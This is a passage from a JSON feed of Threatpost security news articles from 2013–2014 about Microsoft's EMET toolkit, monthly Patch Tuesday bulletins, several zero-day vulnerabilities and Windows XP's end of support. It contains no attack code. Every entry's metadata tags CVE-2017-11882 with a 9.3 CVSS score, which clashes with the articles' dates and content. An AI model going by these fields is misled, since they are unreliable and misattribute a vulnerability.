With 5.0, users will have the option to run plug-ins in the Intranet zone while blocking them in the browser\u2019s Internet zone, or vice-versa.\n\n\u201cIt gives customers more control over how plug-ins are loaded into applications,\u201d said Ness, explaining users will have the flexibility, for example, to allow Flash to load in a browser, but block it in an Office application such as Word or Excel. A number of advanced attacks have contained malicious embedded Flash files inside benign Word documents or Excel spreadsheets. Microsoft hopes to use feedback received on the Technical Preview to shape the final 5.0 product.\n\n\u201cFeedback is really valuable, and has helped shape this tool,\u201d Ness said, adding that the release of EMET 4.1 was delayed right before launch to correct a shortcoming pointed out by a beta user. The customer was not pleased with EMET\u2019s automatic termination of applications upon detecting an exploit, rather than having a configuration option available where the event could be logged and analyzed later.\n\nMicrosoft has been vocal about recommending EMET as a temporary mitigation for zero-day attacks against previously unreported vulnerabilities. EMET includes a dozen mitigations that block exploit attempts targeting memory vulnerabilities. Most of the mitigations are for return-oriented programming exploits, in addition to memory-based mitigations ASLR, DEP, heap spray and SEHOP protections. EMET is not meant as a permanent fix, but only as a stopgap until a patch is ready for rollout.\n\nThe second new feature in the EMET 5.0 Technical Preview is a number of enhanced capabilities to Export Address Table Filtering, or EAF+. Ness said EAF+ blocks how shellcode calls are made into EA table filtering.\n\n\u201cWith OS functions such as open file or create process, exported code wants to jump into EAF. This filters the shellcode and blocks it if it\u2019s an exploit,\u201d Ness said. 
\u201cWe\u2019re extending that with new filtering (KERNELBASE exports and additional integrity checks on stack registers and limits).\u201d\n\nEMET raises development costs for exploit writers with its memory protections, so much so that the recent Operation SnowMan APT attack included a module that detected whether an EMET library was present and if so, the exploit would not execute itself. Researchers have developed bypasses of EMET\u2019s mitigations, first Aaron Portnoy of Exodus Intelligence last summer, and most recently, researchers at Bromium Labs who developed a complete EMET bypass.\n\nMicrosoft\u2019s Ness said improvements to EMET\u2019s Deep Hooks API protections have been rolled into the 5.0 Technical Preview that address the Bromium bypass. Whether it remains on by default in the final 5.0 remains to be seen as application compatibility issues have to be resolved first, Ness said.\n", "cvss3": {}, "published": "2014-02-25T16:37:11", "type": "threatpost", "title": "Microsoft EMET 5.0 Technical Preview Released", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-25T21:37:11", "id": "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "href": "https://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:23", "description": "The expected continued respite from deploying Internet Explorer patches was apparently a mirage as Microsoft changed course from last Thursday\u2019s advance notification and added two more bulletins to the [February 2014 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms14-feb>), including the first IE rollup of 2014.\n\nIE had been patched monthly for close to a year until the January security bulletins were released, and eyebrows were raised again last Thursday when there was no mention of an IE 
update.\n\nToday, however, Microsoft reversed course with [MS14-010](<https://technet.microsoft.com/en-us/security/bulletin/ms14-010>), which patches 24 vulnerabilities in the browser, including one that has been publicly disclosed. No active exploits have been reported, Microsoft said.\n\nAll of the vulnerabilities enable remote code execution, and affect versions of IE going back to IE 6 on Windows XP up to IE 11 on Windows 8.1. More than 20 CVEs involving memory corruption vulnerabilities in IE were addressed along with a cross-domain information disclosure vulnerability, an elevation of privilege vulnerability and a memory corruption issue related to VBScript that is addressed in [MS14-011](<https://technet.microsoft.com/en-us/security/bulletin/ms14-011>).\n\nAn IE user would have to be lured to a website hosting an exploit for the vulnerability in the VBScript scripting engine in Windows. The engine improperly handles objects in memory, Microsoft said, and an exploit could corrupt memory and allow an attacker to run code on a compromised machine.\n\n\u201cTo go from five to seven bulletins says to me that initial testing was completed last minute so they decided to slip the patch in or testing found an issue and engineer shipped a fix last minute,\u201d said Tyler Reguly, manager of security research at Tripwire. \u201cEither way, pay extra attention to MS14-010 and MS14-011 in your test environments this month before you push them out enterprise wide.\u201d\n\nColleague Craig Young cautions that a number of the IE vulnerabilities can be combined to gain admin access on compromised machines.\n\n\u201cWithout any doubt, attacks in the wild will continue and expand to the other vulnerabilities being fixed today,\u201d Young said.\n\nAs promised, Microsoft did patch a remote code execution vulnerability, [MS14-008](<https://technet.microsoft.com/en-us/security/bulletin/ms14-008>), in its Forefront Protection for Exchange 2010 security product. 
Microsoft said it removed the offending code from the software.\n\n\u201cI\u2019m sure a lot of people will call attention to the Forefront Protection for Exchange patch this month. However when Microsoft, the people with the source code, tells us they can\u2019t trigger the vulnerability in a meaningful way, I intend to believe them,\u201d said Tripwire\u2019s Reguly. \u201cI suspect we\u2019ll wake up tomorrow and beyond pressing apply, we\u2019ll forget this was even released.\u201d\n\nMicrosoft stopped updating Forefront for Exchange as of September 2012, but will support it with security updates for another 22 months.\n\n\u201cThis should make administrators think about upgrading their Exchange servers to the latest version (which includes basic anti-malware protection by default) or consider a third party email security application,\u201d said Russ Ernst of Lumension. \u201cAdministrators that currently use Forefront Protection for Exchange have until December 2015 to get this done.\u201d\n\nThe final critical bulletin, [MS14-007](<https://technet.microsoft.com/en-us/security/bulletin/ms14-007>), is another remote code execution bug in Direct2D, which can only be triggered viewing malicious content in IE. Direct2D is a graphics API used for rendering 2-D geometry, bitmaps and text, Microsoft said. 
This vulnerability affects Windows 7 through Windows 8.1.\n\nMicrosoft also released three bulletins rated important that patch privilege elevation, information disclosure and denial of service vulnerabilities.\n\n * [MS14-009](<https://technet.microsoft.com/en-us/security/bulletin/ms14-009>) patches two publicly disclosed bugs in the .NET framework that could allow an attacker to elevate their privileges on a compromised machine.\n * [MS14-005](<https://technet.microsoft.com/en-us/security/bulletin/ms14-005>) handles a vulnerability in Microsoft XML Core Services that could lead to information disclosure if the victim visits a malicious site with IE.\n * [MS14-006](<https://technet.microsoft.com/en-us/security/bulletin/ms14-006>) addresses a denial-of-service vulnerability in Windows 8, RT, and Server 2012, that has been publicly disclosed. An attacker would have to send a large number of malicious IPv6 packets to a vulnerable system to exploit the bug, and the attacker must be on the same subnet as the victim.\n\nMicrosoft also sent out an update that officially [deprecates the use of the MD5 hash algorithm](<http://threatpost.com/light-microsoft-patch-load-precedes-md5-deprecation/104104>). Digital certificates with MD5 hashes issued under roots in the Microsoft root certificate program are from now on restricted.\n\n\u201cCertificates with MD5 hashes should no longer be considered safe,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing. 
\u201cWe\u2019ve given our customers six months to prepare their environments, and now this update is available through automatic updates.\u201d\n", "cvss3": {}, "published": "2014-02-11T14:19:34", "type": "threatpost", "title": "February 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-11T19:19:34", "id": "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "href": "https://threatpost.com/microsoft-adds-critical-ie-patches-under-the-wire/104214/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:33", "description": "Microsoft announced Thursday that it plans to release four bulletins next week as part of the year\u2019s first batch of [Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2014/01/09/advance-notification-service-for-the-january-2014-security-bulletin-release.aspx>), none of which are rated critical.\n\nDespite the relatively light load, the patches do address a [zero-day vulnerability in Windows XP and Windows Server 2003](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) made public in early November. Hackers were actively exploiting the [flaw in the ND Proxy driver that manages Microsoft\u2019s Telephony API](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) on XP via infected PDF attachments. 
Exploits work only in conjunction with an Adobe Reader vulnerability that has since been patched.\n\nIn addition to Microsoft patches, expect a fresh batch of Adobe patches as well as Oracle\u2019s quarterly Critical Patch Update, which is generally a massive patch rollout that now includes Java patches.\n\nThe Microsoft bulletins will address vulnerabilities in Windows, Office and Dynamics AX, all which Microsoft has deemed important, including the zero-day fixes.\n\n\u201cIt\u2019s only rated important for a variety of reasons, including the fact that Microsoft will end support for XP in April,\u201d said Russ Ernst, a director of product management at Lumension. \u201cIf you\u2019re still using XP, this will be an important patch to deploy. And, hopefully you are working on your migration plan.\u201d\n\nAccording to a post on Microsoft\u2019s Security Response Center blog by Dustin Childs, MS14-002, will address the zero day, and he acknowledged they were working on a patch for the issue \u2013 which stems from a vulnerability in the kernel and allows local privilege escalation and access to the kernel \u2013 back in December.\n\n\u201cWe have only seen this issue used in conjunction with a PDF exploit in targeted attacks, and not on its own,\u201d Childs said.\n\nMicrosoft has used the zero-day vulnerability as a prime opportunity to urge [Windows users to migrate off XP](<http://threatpost.com/microsoft-xp-end-of-life-an-important-security-milestone/102789>). 
The company previously announced its plans to effectively end support for the operating system on April 8.\n\nThe first bulletin will address a remote code execution in Microsoft\u2019s Sharepoint Server and Microsoft Word, the third will fix an elevation of privilege in Windows 7 and Server 2008 R2 and the last bulletin will fix a denial of service (DoS) issue in Microsoft\u2019s enterprise resource planning software, Dynamics AX.\n\nPer usual Microsoft will push updates for the software in question next Tuesday and post patch analysis and deployment guidance on its Security Response Center blog.\n", "cvss3": {}, "published": "2014-01-09T13:02:31", "type": "threatpost", "title": "Microsoft to Patch Zero Day in January 2014 Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-01-14T19:04:09", "id": "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "href": "https://threatpost.com/microsoft-expected-to-patch-xp-zero-day-on-patch-tuesday/103591/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:41", "description": "One zero-day down, one to go.\n\nAs expected, Microsoft did today patch a zero-day in its GDI+ graphics component ([MS13-096](<https://technet.microsoft.com/en-us/security/bulletin/ms13-096>)) reported more than a month ago after exploits were spotted in the wild. The fix was one of 11 security bulletins\u2014five critical\u2014released as part of the December 2013 Patch Tuesday security updates.\n\nAnother zero-day, one affecting only Windows XP users, still remains [unpatched despite active exploits](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) targeting the vulnerability, which is found in the NDProxy driver that manages the Microsoft Telephony API. The attacks depend on a second vulnerability to deliver the exploit against an XP machine. 
Microsoft recommends turning off NDProxy as a mitigation until a patch is available.\n\nWhile there were five critical bulletins released today, experts urge IT administrators to also prioritize an ASLR bypass vulnerability that was patched today and rated \u201cimportant\u201d by Microsoft.\n\n[MS13-106](<https://technet.microsoft.com/en-us/security/bulletin/ms13-106>) takes care of an Office vulnerability that is being exploited in the wild, Microsoft said. Attackers hosting a malicious exploit online can trigger the vulnerability in the hxds.dll that enables a bypass of ASLR or Address Space Layout Randomization, a security feature in Windows that mitigates memory corruption exploits.\n\n\u201cThe vulnerability could allow security feature bypass if a user views a specially crafted webpage in a web browser capable of instantiating COM components, such as Internet Explorer,\u201d Microsoft said in its advisory. \u201cThe security feature bypass by itself does not allow arbitrary code execution. However, an attacker could use this ASLR bypass vulnerability in conjunction with another vulnerability, such as a remote code execution vulnerability that could take advantage of the ASLR bypass to run arbitrary code.\u201d\n\nASLR bypasses have been more frequent this year, and have been rolled into a number of exploit kits. Introduced in Windows Vista, ASLR hampers the reliability of exploits by negating an attacker\u2019s ability to predict where machine instructions will exist in memory. ASLR is particularly effective against buffer overflow attacks.\n\n\u201cThis particular library, hxds.dll, has been used by numerous attacks in the wild with great success because it can be easily loaded into memory from a web page by using the \u2018ms-help:\u2019 protocol handler,\u201d said Craig Young, security researcher at Tripwire. 
\u201cUntil today, the only options that protect against this were the removal of Office 2007/2010 installs or enabling Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET).\u201d\n\nAdmins will also have to contend with yet another cumulative update for Internet Explorer. [MS13-097](<https://technet.microsoft.com/en-us/security/bulletin/ms13-097>) patches a number of remote code execution vulnerabilities in the browser, all the way back to IE 6. IE has been patched almost monthly this year and has been front and center in numerous targeted attacks.\n\nMicrosoft also patched a critical bug in its Authenticode signing algorithm that is being exploited. [MS13-098](<https://technet.microsoft.com/en-us/security/bulletin/ms13-098>) allows remote code execution if a user is enticed to run an application that contains a malicious and signed portable executable file. The patch modifies how the WinVerifyTrust function handles Windows Authenticode signature verification for PE files, Microsoft said.\n\n\u201cAttackers have been abusing installers from legitimate software makers to install malware. These installers are configured in a way to dynamically download code extensions that are not checked for correct signatures, and attackers have found a way to piggyback on that mechanism,\u201d said Qualys CTO Wolfgang Kandek, who added that the patch prepares the system for a more stringent integrity check that prevents such exploits. 
Microsoft also issued a separate [security advisory](<http://technet.microsoft.com/en-us/security/advisory/2915720>) regarding the Authenticode patch, that after June 10, 2014 it will no longer recognize non-compliant signed binaries.\n\nThe two remaining critical bulletins, [MS13-099](<https://technet.microsoft.com/en-us/security/bulletin/ms13-099>) and [MS13-105](<https://technet.microsoft.com/en-us/security/bulletin/ms13-105>), patch remote code execution vulnerabilities in Microsoft Scripting Runtime Object Library and Exchange Server respectively. Three of the four Exchange vulnerabilities addressed in the bulletin, it\u2019s worth noting, are publicly disclosed. The most serious is in the WebReady Document Viewing and DLP features of Exchange Server, Microsoft said.\n\nThe remaining bulletins\u2014rated \u201cimportant\u201d\u2014address one remote code execution bug, three privilege escalation issues and an information disclosure vulnerability:\n\n * [MS13-100](<https://technet.microsoft.com/en-us/security/bulletin/ms13-100>) patches a remote code execution vulnerability in Microsoft SharePoint Server; an attacker would have to be authenticated to the server to exploit the vulnerability. A successful exploit would enable an attacker to run code in the context of the W3WP service account on the SharePoint site.\n * [MS13-101](<https://technet.microsoft.com/en-us/security/bulletin/ms13-101>) fixes a privilege elevation issue in Windows Kernel-Mode Drivers. An attacker would have to log onto a system and run a malicious application to exploit the bug.\n * [MS13-102](<https://technet.microsoft.com/en-us/security/bulletin/ms13-102>) is a patch for a vulnerability in the LRPC Client that would allow an attacker to elevate their privileges on an LRPC server. Doing so would allow an attacker to install programs, manipulate data or create accounts. 
Valid credentials are needed to exploit this bug.\n * [MS13-103](<https://technet.microsoft.com/en-us/security/bulletin/ms13-103>) patches a vulnerability in ASP.NET SignalR that could elevate an attacker\u2019s privileges if they are able to reflect JavaScript back to the user\u2019s browser. Microsoft also issued an [advisory](<http://technet.microsoft.com/en-us/security/advisory/2905247>) for a flaw in ASP.NET view state that exists when Machine Authentication Code (MAC) validation is disabled through configuration settings.\n * [MS13-104](<https://technet.microsoft.com/en-us/security/bulletin/ms13-104>) is a fix for an information disclosure vulnerability in Microsoft Office. Successful exploits could give an attacker access tokens used to authenticate a user on a SharePoint or Office server site.\n\nMicrosoft also sent out an [advisory](<http://technet.microsoft.com/en-us/security/advisory/2871690>) that revokes the digital signatures for nine private, third-party UEFI modules for Windows 8 and Windows Server 2012 machines. 
These modules would be loaded during a UEFI Secure Boot, if it is enabled.\n", "cvss3": {}, "published": "2013-12-10T16:09:59", "type": "threatpost", "title": "December 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-12T20:37:55", "id": "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "href": "https://threatpost.com/microsoft-patches-gdi-zero-day-experts-urge-close-look-at-important-aslr-bypass-patch/103157/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:43", "description": "Microsoft will, next week, patch a [zero-day vulnerability in its GDI+ graphics component](<http://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821>) being exploited in targeted attacks in the Middle East and Asia.\n\nThe zero day has sat unpatched since it was made public Nov. 5; Microsoft did release a FixIt tool as a temporary mitigation. The patch is one of 11 bulletins Microsoft said today it will release as part of its [December 2013 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms13-dec>); five of the bulletins will be rated critical.\n\nMicrosoft did confirm, however, that a [zero day in the NDProxy driver](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) that manages the Microsoft Telephony API on Windows XP systems will not be patched. That zero day is also being exploited in the wild alongside a PDF exploit of a patched Adobe Reader flaw.\n\nThe GDI+ vulnerability is found in several versions of Windows and Office and enables an attacker to gain remote-code execution, but only on Windows Vista, Windows Server 2008, and Office 2003 through 2010. The vulnerability exists in the way the GDI+ component handles TIFF images. 
Microsoft said an attacker would have to entice a victim to preview or open a malicious TIFF attachment or visit a website hosting the exploit image.\n\nTuesday\u2019s critical patches address remote code execution vulnerabilities in a number of Microsoft products, including not only Windows and Office, but Lync, Internet Explorer and Exchange. Vulnerabilities in SharePoint, Lync, SignalR and ASP.NET are among those rated important by Microsoft. Those vulnerabilities are primarily privilege escalation issues as well as an information disclosure bug.\n\nThis will be the last scheduled release of security updates from Microsoft for the year. It looks like Tuesday\u2019s updates will bring the 2013 count to 106 bulletins, up sharply from 83 last year, according to Qualys CTO Wolfgang Kandek. Microsoft had similar numbers of bulletins in 2011 (100) and 2010 (106).\n\n\u201cRegarding 0-days, Microsoft has consistently pointed out that the additional security toolkit EMET (Enhanced Mitigation Experience Toolkit) has been effective against all of the 0-day problems this year,\u201d Kandek said. \u201cWe believe it is a proactive security measure that organizations should evaluate and consider as an additional layer in their defensive measures.\u201d\n\nThe XP zero-day, meanwhile, will likely be left for the January 2014 Patch Tuesday updates. The vulnerability is a privilege escalation vulnerability and allows kernel access.\n\nFireEye researchers said they found the exploit in the wild being used [alongside a PDF-based exploit](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html>) against a patched Adobe Reader vulnerability. Reader versions 9.5.4, 10.1.6, 11.0.02 and earlier on XP SP3 are affected, later versions are not, FireEye said, adding that this exploit gives a local user the ability to execute code in the kernel, such as install new software, manipulate data, or create new accounts. 
The exploit cannot be used remotely, the company said.\n\nMicrosoft recommended deleting the NDProxy.sys driver as a workaround; the mitigation, however, will impact TAPI operations.\n\n\u201cSystem administrators everywhere must have made Microsoft\u2019s naughty list because this holiday \u2018gift\u2019 is clearly a lump of coal,\u201d said Tyler Reguly, technical manager of security research and development at Tripwire. \u201cMicrosoft is wrapping up the 2013 patch season with anything that was laying around. Someone should tell Microsoft they forgot to include the kitchen sink.\u201d\n", "cvss3": {}, "published": "2013-12-05T16:07:42", "type": "threatpost", "title": "TIFF Zero Day Patch Among December 2013 Microsoft updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-05T21:07:43", "id": "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "href": "https://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:49", "description": "Microsoft announced this afternoon that the zero-day vulnerability being exploited in a watering hole attack against an unnamed U.S.-based NGO website was already scheduled to be patched in a [cumulative Internet Explorer update](<http://blogs.technet.com/b/msrc/archive/2013/11/11/activex-control-issue-being-addressed-in-update-tuesday.aspx>) tomorrow.\n\nThe zero-day was reported publicly on Friday by FireEye researchers and today a few more dots were connected on the attack, which is dropping a variant of the McRAT Trojan that has been used in a number of [targeted espionage attacks](<http://threatpost.com/ie-zero-day-watering-hole-attack-injects-malicious-payload-into-memory/102891>) targeting industrial secrets.\n\nMicrosoft promised a relatively light [Patch Tuesday 
tomorrow](<http://threatpost.com/tiff-zero-day-missing-from-november-patch-tuesday-updates/102864>) that included another IE rollup, a staple of the company\u2019s monthly security updates in 2013. Dustin Childs, a group manager in the Microsoft Trustworthy Computing group, said today that the vulnerability in an IE ActiveX Control will be patched in MS13-90 tomorrow.\n\nIn its [advanced notification](<http://technet.microsoft.com/en-us/security/bulletin/ms13-nov>) released last Thursday, Microsoft said the IE bulletin is rated critical because it involves flaws that can lead to remote code execution. The critical rating applies to IE 6-8 on Windows XP, IE7-9 on Vista, IE 8-10 on Windows 7, and IE 10 on Windows 8 and 8.1; all other versions are rated important.\n\nFireEye, today told Threatpost, that the attack is limited to a single U.S.-based website hosting domestic and international policy guidance. No details were available on how the site was compromised, only that the victims were hit by malware in drive-by download attacks targeting an information leakage vulnerability and a memory corruption issue leading to remote code execution.\n\nWhat differentiates this attack from other watering hole attacks is that victims are not subject to malicious iframes or traffic-redirects to attacker-controlled sites and further malware downloads. 
Instead, McRAT is injected directly into memory, a new twist on advanced targeted attacks.\n\n\u201cBy using memory-only methods, the attack is exceptionally difficult for network defenders to detect, when trying to examine and confirm which endpoints are infected, using traditional disk-based forensics methods,\u201d said Darien Kindlund, FireEye director of threat intelligence.\n\nMicrosoft said a number of mitigations are available to IE users as a mitigation until a patch is applied, namely setting security zone settings to \u201cHigh\u201d to block ActiveX Controls and Active Scripting, though users could experience some usability issues. IE can also be configured to prompt a user before running Active Scripting. The Enhanced Mitigation Experience Toolkit (EMET) is also a viable mitigation, Microsoft said.\n\nThe IE patch is one of eight bulletins scheduled for tomorrow, three of those rated critical. The scheduled security updates, however, will not include a patch for the Windows TIFF zero day being actively exploited in attacks primarily in Pakistan. The vulnerability in several Windows and Office versions is being exploited in [targeted attacks](<http://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821>) against Windows XP systems running Office 2007. 
Microsoft released a [Fix-It](<https://support.microsoft.com/kb/2896666>) tool as a stopgap measure until a patch is released out of band or with the December security updates.\n", "cvss3": {}, "published": "2013-11-11T17:54:28", "type": "threatpost", "title": "IE Zero Day Patch Already in November Patch Tuesday Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-12T22:11:19", "id": "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "href": "https://threatpost.com/microsoft-ie-zero-day-patch-among-november-patch-tuesday-updates/102898/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:53", "description": "Forget for a moment the impending cryptoapocalypse because of aging and/or subverted encryption standards and algorithms. Microsoft this week put out the word on the scourge that is Windows XP.\n\nThe latest [Microsoft Security Intelligence Report](<http://www.microsoft.com/security/sir/default.aspx>) goes to great pains to encourage users to move off the soon-to-be unsupported version of Windows. The report, reflecting activity collected and monitored by its security tools from January to June, points out that XP computers are six times more likely to be infected than younger, more robust versions of the OS.\n\n\u201cOlder software is easier to break into and over time, cybercriminals learn how to bypass mitigations,\u201d said Microsoft spokesperson Holly Stewart. \u201cXP is no different. A good example is DEP (Data Execution Prevention) which was not commonly bypassed when it was released. The utility of that mitigation has degraded year over year.\u201d\n\nDEP and Address Space Layout Randomization (ASLR) are memory protections built into Windows starting with Vista. They\u2019re meant to ward off buffer overflow attacks and frustrate hackers from being able to inject code into predictable areas of memory in the operating system. 
In 2006, there was one DEP bypass for every 13 vulnerabilities; that\u2019s done almost an about-face as of 2012, Microsoft said, with six bypasses happening for every three CVEs. Hackers have found ingenious means of beating DEP and ASLR, stringing together exploits for numerous vulnerabilities to bypass these protections and jeopardize data stored on the host machine.\n\n\u201cNewer software is less appealing to cybercriminals,\u201d Stewart said. \u201cAdvanced technology is harder to exploit, and there\u2019s been a long list of platform security improvements. XP, however, is not equipped to provide these innovations.\u201d\n\nMicrosoft will no longer support XP after next April, meaning it will no longer provide security patches and advisories for vulnerabilities discovered on the platform. Yet according to the latest desktop operating system market share numbers, XP installations trail only Windows 7; Netmarketshare.com says XP is still running on 31 percent of desktops. Windows 7 leads with 46.4 percent.\n\n\u201cFrom a security perspective, this is a really important milestone,\u201d Stewart said. \u201cAttackers will start to have a greater advantage over defenders. There were 30 security bulletins for XP this year, which means there would have been 30 zero-day vulnerabilities on XP [without support].\u201d\n\nMicrosoft is also using a new metric, comparing infection rates with what it\u2019s calling an encounter rate. As explained in the Security Intelligence Report, \u201cencounters\u201d are the number of times one of the company\u2019s security tools such as the Microsoft Malicious Software Removal Tool comes up against a piece of malware. Previously, Microsoft would count what it called Computers Cleaned per Mile, or CCM. 
This was the number of computers cleaned for every 1,000 times the MSRT was tripped by a piece of malware.\n\nUsing the new metrics, Microsoft demonstrates that XP users running SP3 are six times more likely to become infected than someone running Windows 8 RTM on their machine\u20149.1 XP computers cleaned per 1,000 versus 1.6 Windows 8 machines. As for the encounter rate, the numbers aren\u2019t too staggeringly different with 16.1 percent of XP SP3 machines reporting an encounter versus 19.1 percent of Windows 7 machines and 12.4 percent of Windows 8 computers.\n\n\u201cThe encounter rate gives you an idea of how frequently a customer is exposed to a malware threat,\u201d Stewart said. \u201cWe\u2019ve reached a tipping point where this dated architecture can\u2019t be relied upon.\u201d\n", "cvss3": {}, "published": "2013-11-01T14:07:56", "type": "threatpost", "title": "Windows XP End of Life a Security Milestone", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-06T21:46:51", "id": "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "href": "https://threatpost.com/microsoft-xp-end-of-life-an-important-security-milestone/102789/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:03", "description": "[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/10/07040458/andrew_storms.jpg>)On Oct. 9, 2003, Microsoft announced its new security patching process that would end up being a catalyst for significant change in the information security community. 
Ten years ago, the program was announced with a press release that promised\n\n * \u201cImproved patch management processes, policies and technologies to help customers stay up to date and secure.\u201d\n * \u201cGlobal education programs to provide better guidance and tools for securing systems.\u201d\n\nWithin the [press release](<http://www.prnewswire.com/news-releases/microsoft-outlines-new-initiatives-in-ongoing-security-efforts-to-help-customers-72447792.html>), chief executive officer Steve Ballmer said: \u201cOur goal is simple: Get our customers secure and keep them secure. Our commitment is to protect our customers from the growing wave of criminal attacks.\u201d\n\nThose of us working in the security industry or with corporate information security responsibility saw this as a direct response from the famous [Trustworthy Computing memo](<http://www.microsoft.com/en-us/news/features/2012/jan12/gatesmemo.aspx>) penned by Bill Gates in January 2002. The signs were clear. Microsoft was faced with a serious dilemma. Its software was riddled with security holes that were having a direct negative effect on its customers\u2019 security, availability and privacy. In corporate IT, Microsoft had quickly gotten its own nickname of \u201cnecessary evil.\u201d IT managers were forced to use Microsoft software for its business features, but it came at the cost of serious security risks.\n\nWhether you like or disdain Microsoft, the new security initiatives started 10 years ago created a great wave of change in our information security industry.\n\nFor starters, Microsoft proved to the security community that communication is a key cornerstone to vendor relationships. No one likes to admit they have security problems. Microsoft took the leap of not only admitting it had a problem, but also committed to delivering ongoing communications to its customers and to all computing users. 
Microsoft started blogging about security issues and also embarked on serious outbound communication campaigns to educate users.\n\nMicrosoft showed that communication and relationships are a two-way street. The powerhouse eventually grew to an age where it embraced the same community of people who were responsible for finding and publicly releasing security holes in its software. Today, public disclosure of serious Microsoft security holes is the exception.\n\nAlso, resource planning is table stakes in the enterprise IT world. Being a cost center doesn\u2019t help much, but IT has traditionally been underfunded and underappreciated. What is an enterprise IT or security manager supposed to do when their primary software vendor springs on them a critical security patch with do-or-die consequences? Historically, and still the case today, a lot of ongoing projects get dropped to quickly reallocate resources to the moment\u2019s critical security patch. Living in a world of constant interruption is detrimental to morale and to the completion of any planned projects.\n\nWith Microsoft\u2019s new consistent patch release timing, enterprise IT could depend on a schedule and allocate resources accordingly. The monthly patching cycle soon became better known as Patch Tuesday. Later in Microsoft\u2019s maturity model, it would introduce the advanced notification service. We know this today as the Thursday before Patch Tuesday, when we receive a high level snippet of what to expect the following week.\n\nMicrosoft also proved value with consistency in other ways. For example, Microsoft took the early bold step of defining its security criticality ratings and made the definitions public. Even Microsoft\u2019s security bulletin text format and sections were delivered in a consistent format that security professionals have come to rely upon. Security people like repeatable and dependable systems. Microsoft delivered just that.\n\nThree cheers to Patch Tuesday. 
It\u2019s the second Tuesday of each month that we both love and hate. Ten years ago, the Patch Tuesday initiatives created profound benefits for all Microsoft consumers by making it easier to keep systems patched and more secure. At the time, the idea seemed so foreign, but it has since gained so much following that other vendors such as Cisco, Adobe and Oracle have followed suit. Spend just five minutes and consider where you\u2019d be today without Microsoft taking the leap 10 years ago.\n\n_Andrew Storms is the Director of DevOps for CloudPassage._\n", "cvss3": {}, "published": "2013-10-02T09:40:46", "type": "threatpost", "title": "A Decade of Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-10-07T15:44:02", "id": "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "href": "https://threatpost.com/take-time-to-reflect-as-microsoft-patch-tuesday-turns-10/102488/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft announced Wednesday afternoon that it has pulled [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>), one of the patches issued yesterday for vulnerabilities in Exchange Server 2013.\n\nMicrosoft said the patch is causing issues with the content index for mailbox databases. 
